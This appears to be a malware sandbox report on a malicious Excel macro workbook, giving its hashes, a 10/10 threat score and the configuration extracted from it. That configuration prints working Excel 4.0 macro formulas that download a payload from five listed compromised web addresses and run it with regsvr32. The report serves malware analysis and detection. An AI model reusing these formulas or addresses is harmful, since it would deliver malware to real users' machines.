Overview

overview

10

Static

static

10

32c1b34424...f.xlsm

windows7-x64

10

32c1b34424...f.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    32c1b344244a44a70508ebe2049120510c719a0f6821738ee88089cce702b0ff

  • Size

    69KB

  • Sample

    241121-aceyjswcrd

  • MD5

    4083f6a9cb4bed287b1efa9203c177ca

  • SHA1

    75805a36fe4eaa64b99a4b640b5f6efd0fd1197a

  • SHA256

    32c1b344244a44a70508ebe2049120510c719a0f6821738ee88089cce702b0ff

  • SHA512

    51cb5e44e5454ecfed2435b1846e8c2e9a16daac6ab714d446088013cebfac5d7efc89de5d3f88f4e1a15c44b61f1e41974e01e11be7e292be27ecaca4b1fedd

  • SSDEEP

    1536:9p0b/XHTWhxndhjh/VwBpSZobSex7jB0FfuZibVyg:8zWhxHjh88ZoH7juFuZiQg

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://vasilestudio.com/wp-admin/pZ1vbd5Z/

https://estesgroup.net/New-site-25062021/UkQPppHG9pLNE/

https://robointeligentedecomentarios.com/wp-includes/YBS9a02Y68auiEdP/

https://triclicks.net/wp-admin/bv/

https://thecanadianarab.com/wp-content/VJ/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vasilestudio.com/wp-admin/pZ1vbd5Z/","..\aua.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://estesgroup.net/New-site-25062021/UkQPppHG9pLNE/","..\aua.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://robointeligentedecomentarios.com/wp-includes/YBS9a02Y68auiEdP/","..\aua.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://triclicks.net/wp-admin/bv/","..\aua.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://thecanadianarab.com/wp-content/VJ/","..\aua.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\aua.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://vasilestudio.com/wp-admin/pZ1vbd5Z/
xlm40.dropper

https://estesgroup.net/New-site-25062021/UkQPppHG9pLNE/
xlm40.dropper

https://robointeligentedecomentarios.com/wp-includes/YBS9a02Y68auiEdP/
xlm40.dropper

https://triclicks.net/wp-admin/bv/
xlm40.dropper

https://thecanadianarab.com/wp-content/VJ/

Targets

    • Target

      32c1b344244a44a70508ebe2049120510c719a0f6821738ee88089cce702b0ff

    • Size

      69KB

    • MD5

      4083f6a9cb4bed287b1efa9203c177ca

    • SHA1

      75805a36fe4eaa64b99a4b640b5f6efd0fd1197a

    • SHA256

      32c1b344244a44a70508ebe2049120510c719a0f6821738ee88089cce702b0ff

    • SHA512

      51cb5e44e5454ecfed2435b1846e8c2e9a16daac6ab714d446088013cebfac5d7efc89de5d3f88f4e1a15c44b61f1e41974e01e11be7e292be27ecaca4b1fedd

    • SSDEEP

      1536:9p0b/XHTWhxndhjh/VwBpSZobSex7jB0FfuZibVyg:8zWhxHjh88ZoH7juFuZiQg

    Score
    10/10
    discovery
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks